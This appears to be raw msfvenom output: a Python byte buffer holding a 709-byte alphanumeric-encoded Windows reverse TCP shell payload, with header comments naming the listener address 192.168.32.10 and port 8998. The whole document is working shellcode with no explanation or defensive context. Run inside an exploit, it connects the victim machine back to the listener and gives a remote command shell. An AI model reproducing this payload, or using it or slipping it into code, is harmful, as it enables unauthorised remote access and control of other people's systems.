# windows/shell_reverse_tcp - 709 bytes
# https://metasploit.com/
# Encoder: x86/alpha_mixed
# VERBOSE=false, LHOST=192.168.32.10, LPORT=8998, 
# ReverseAllowProxy=false, ReverseListenerThreaded=false, 
# StagerRetryCount=10, StagerRetryWait=5, 
# PrependMigrate=false, EXITFUNC=process, CreateSession=true, 
# AutoVerifySession=true
buf =  b""
buf += b"\xdb\xdb\xd9\x74\x24\xf4\x5d\x55\x59\x49\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37"
buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += b"\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x59\x78\x6f\x72"
buf += b"\x47\x70\x43\x30\x63\x30\x31\x70\x6f\x79\x78\x65\x66"
buf += b"\x51\x6f\x30\x55\x34\x6c\x4b\x46\x30\x64\x70\x6c\x4b"
buf += b"\x72\x72\x74\x4c\x6e\x6b\x76\x32\x75\x44\x4c\x4b\x64"
buf += b"\x32\x51\x38\x36\x6f\x58\x37\x52\x6a\x44\x66\x66\x51"
buf += b"\x4b\x4f\x4e\x4c\x75\x6c\x65\x31\x33\x4c\x75\x52\x44"
buf += b"\x6c\x45\x70\x4a\x61\x68\x4f\x54\x4d\x37\x71\x4b\x77"
buf += b"\x4a\x42\x68\x72\x30\x52\x66\x37\x6e\x6b\x61\x42\x56"
buf += b"\x70\x4c\x4b\x73\x7a\x55\x6c\x4c\x4b\x70\x4c\x77\x61"
buf += b"\x30\x78\x5a\x43\x71\x58\x76\x61\x6a\x71\x72\x71\x6e"
buf += b"\x6b\x73\x69\x77\x50\x77\x71\x49\x43\x4c\x4b\x62\x69"
buf += b"\x75\x48\x6a\x43\x75\x6a\x53\x79\x6e\x6b\x65\x64\x4c"
buf += b"\x4b\x76\x61\x49\x46\x46\x51\x6b\x4f\x6e\x4c\x6f\x31"
buf += b"\x78\x4f\x34\x4d\x35\x51\x39\x57\x70\x38\x79\x70\x73"
buf += b"\x45\x58\x76\x56\x63\x51\x6d\x6c\x38\x35\x6b\x51\x6d"
buf += b"\x77\x54\x30\x75\x4b\x54\x72\x78\x6c\x4b\x73\x68\x47"
buf += b"\x54\x33\x31\x59\x43\x70\x66\x4c\x4b\x74\x4c\x42\x6b"
buf += b"\x4e\x6b\x76\x38\x57\x6c\x46\x61\x78\x53\x4e\x6b\x75"
buf += b"\x54\x4e\x6b\x46\x61\x6a\x70\x6b\x39\x51\x54\x54\x64"
buf += b"\x51\x34\x31\x4b\x33\x6b\x33\x51\x72\x79\x71\x4a\x56"
buf += b"\x31\x4b\x4f\x49\x70\x53\x6f\x43\x6f\x43\x6a\x6e\x6b"
buf += b"\x46\x72\x4a\x4b\x6e\x6d\x63\x6d\x61\x78\x50\x33\x47"
buf += b"\x42\x63\x30\x73\x30\x35\x38\x70\x77\x62\x53\x54\x72"
buf += b"\x61\x4f\x43\x64\x70\x68\x70\x4c\x44\x37\x47\x56\x47"
buf += b"\x77\x79\x6f\x58\x55\x48\x38\x6a\x30\x33\x31\x47\x70"
buf += b"\x57\x70\x35\x79\x48\x44\x31\x44\x30\x50\x35\x38\x37"
buf += b"\x59\x4d\x50\x42\x4b\x43\x30\x49\x6f\x38\x55\x36\x30"
buf += b"\x32\x70\x36\x30\x66\x30\x53\x70\x56\x30\x43\x70\x30"
buf += b"\x50\x52\x48\x6b\x5a\x74\x4f\x4b\x6f\x79\x70\x6b\x4f"
buf += b"\x7a\x75\x7a\x37\x50\x6a\x57\x75\x45\x38\x59\x50\x6d"
buf += b"\x78\x45\x70\x46\x6a\x53\x58\x35\x52\x73\x30\x44\x63"
buf += b"\x57\x56\x6b\x39\x4a\x46\x31\x7a\x56\x70\x30\x56\x43"
buf += b"\x67\x32\x48\x7a\x39\x49\x35\x32\x54\x35\x31\x79\x6f"
buf += b"\x69\x45\x6d\x55\x49\x50\x52\x54\x36\x6c\x59\x6f\x32"
buf += b"\x6e\x73\x38\x31\x65\x48\x6c\x30\x68\x4a\x50\x4d\x65"
buf += b"\x4d\x72\x76\x36\x49\x6f\x7a\x75\x70\x68\x51\x73\x70"
buf += b"\x6d\x30\x64\x67\x70\x6b\x39\x5a\x43\x76\x37\x63\x67"
buf += b"\x76\x37\x50\x31\x59\x66\x51\x7a\x72\x32\x32\x79\x71"
buf += b"\x46\x38\x62\x59\x6d\x65\x36\x7a\x67\x71\x54\x54\x64"
buf += b"\x65\x6c\x36\x61\x67\x71\x4c\x4d\x42\x64\x47\x54\x76"
buf += b"\x70\x6b\x76\x53\x30\x47\x34\x71\x44\x62\x70\x63\x66"
buf += b"\x30\x56\x66\x36\x31\x56\x50\x56\x50\x4e\x61\x46\x43"
buf += b"\x66\x76\x33\x63\x66\x75\x38\x43\x49\x58\x4c\x65\x6f"
buf += b"\x6c\x46\x4b\x4f\x6e\x35\x4d\x59\x39\x70\x42\x6e\x63"
buf += b"\x66\x70\x46\x69\x6f\x30\x30\x43\x58\x53\x38\x4f\x77"
buf += b"\x45\x4d\x61\x70\x59\x6f\x4e\x35\x4f\x4b\x4c\x30\x6c"
buf += b"\x75\x6f\x52\x71\x46\x62\x48\x6e\x46\x6f\x65\x4f\x4d"
buf += b"\x6f\x6d\x4b\x4f\x4b\x65\x65\x6c\x53\x36\x53\x4c\x45"
buf += b"\x5a\x4b\x30\x79\x6b\x6d\x30\x62\x55\x64\x45\x4d\x6b"
buf += b"\x57\x37\x47\x63\x74\x32\x52\x4f\x63\x5a\x37\x70\x50"
buf += b"\x53\x39\x6f\x69\x45\x41\x41"